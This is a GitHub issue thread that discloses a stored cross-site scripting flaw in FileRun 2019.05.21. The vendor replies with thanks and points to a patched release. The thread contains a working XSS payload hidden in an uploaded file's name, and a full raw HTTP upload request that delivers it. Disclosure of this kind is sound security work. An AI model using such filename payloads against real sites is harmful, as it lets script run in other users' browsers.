### ISSUE TITLE
XSS Vulnerability - FileRun 2019.05.21

### ISSUE THREAD

**Issue by EmreOvunc** [filerun/docker#24]
FileRun 2019.05.21 has a cross-site scripting vulnerability that are a type of injection.

To exploit vulnerability, someone could upload an allowed file named ```“><img src=x onerror=prompt(document.domain)>``` to impact users who open the page.

```
POST /filerun/?module=fileman&section=do&page=up HTTP/1.1
Host: 172.16.191.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.191.129/filerun/
Content-Type: multipart/form-data; boundary=---------------------------142096305821079611661465592403
Content-Length: 6034
DNT: 1
Connection: close
Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5

-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowTotalSize"

5100
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowIsFirstChunk"

1
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowIsLastChunk"

1
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowFilename"

â><img src=x onerror=prompt(document.domain)>.jpg
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="path"

/ROOT/HOME
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="file"; filename="â><img src=x onerror=prompt(document.domain)>.jpg"
Content-Type: image/jpg

<%@ I said you should learn! %>


-----------------------------142096305821079611661465592403--
```
![alt tag](https://emreovunc.com/blog/en/FileRun-XSS-Exploit-Vulnerability-01.png)

![alt tag](https://emreovunc.com/blog/en/FileRun-XSS-Exploit-Vulnerability-02.png)

![alt tag](https://emreovunc.com/blog/en/FileRun-XSS-Exploit-Vulnerability-03.png)

**Comment by filerun** [comment]
Now, that's more like it! :)

P.S. I do appreciate your work and findings. Don't get me wrong. But take any popular web-based application, like Wordpress for example, which powers more than a third of the websites around, and you will find lots of folders that are missing an index file allowing for the directory contents to be listed. Is it good practice? Surely it is not, but to call it a vulnerability is quite a stretch.

**Comment by filerun** [comment]
The solution is to install the now available FileRun update (2019.06.01), from the installation's control panel: https://docs.filerun.com/updating
Thank you for the report!
